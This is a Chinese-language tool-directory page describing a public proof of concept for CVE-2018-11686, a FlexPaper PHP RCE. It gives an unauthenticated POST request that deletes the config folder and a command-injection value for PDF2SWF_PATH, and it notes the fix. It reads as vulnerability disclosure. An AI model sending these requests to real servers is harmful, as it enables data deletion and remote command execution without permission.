Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2018-11686 — CVE-2018-11686 - FlexPaper PHP 发布服务远程代码执行漏洞(RCE)<= 2.3.6 | Kitploit
工具/GitHubGitHub/mpgn/cve-2018-11686
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队
GitHubmpgn/cve-2018-11686

CVE-2018-11686

CVE-2018-11686 - FlexPaper PHP 发布服务远程代码执行漏洞(RCE)<= 2.3.6

查看仓库
627年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2018-11686

CVE-2018-11686 - FlexPaper PHP 发布服务 RCE <= 2.3.6

图片

由 Red Timmy Security 发现

技术分析:

  • https://www.exploit-db.com/docs/english/46521-flexpaper-=-2.3.6-remote-code-execution-whitepaper.pdf

安全通告:

  • 未知

概念验证:

  1. 删除配置文件

FlexPaper(PHP)的 change_config.php 文件不会检查管理员是否正确认证,从而允许攻击者删除服务器上的任意文件:

截图4

  • 黄线显示了应放置身份验证检查的位置
  • 红线显示了攻击者使用 PHP unlink 函数删除服务器上文件的路径

攻击者可以构造如下请求,删除其选定文件夹中的文件:

root@kitploit:~
POST /flexpaper/php/change_config.php HTTP/1.1
Host: 127.0.0.1:8888
[...]

SAVE_CONFIG=1&SWF_Directory=config/

通过此请求,攻击者可以删除 config 目录中的所有文件。

  1. 设置新的配置文件

由于 config/ 文件夹中的所有文件均已被删除,FlexPaper 将认为该应用程序从未被初始化:

图片

因此,攻击者能够重新设置 FlexPaper。但为什么呢?

  1. 执行任意命令

在 setup.php 中有一个名为 pdf2swfEnabled 的函数,它使用 PHP 的 exec 命令,其参数由用户在 POST 中传递。由于这是 FlexPaper 的初始化过程(见第 2 步),因此没有身份验证。

截图3

攻击者可以构造如下 payload:?step=4&PDF2SWF_PATH=id;,从而导致执行 exec(id; --version 2>&1)。

  1. 获取输出

攻击者可以将命令的输出重定向到 config 文件夹内的文件中,然后发送 GET 请求读取输出:

图片


修复

身份验证检查已添加到 change_config.php 的开头

图片

下载工具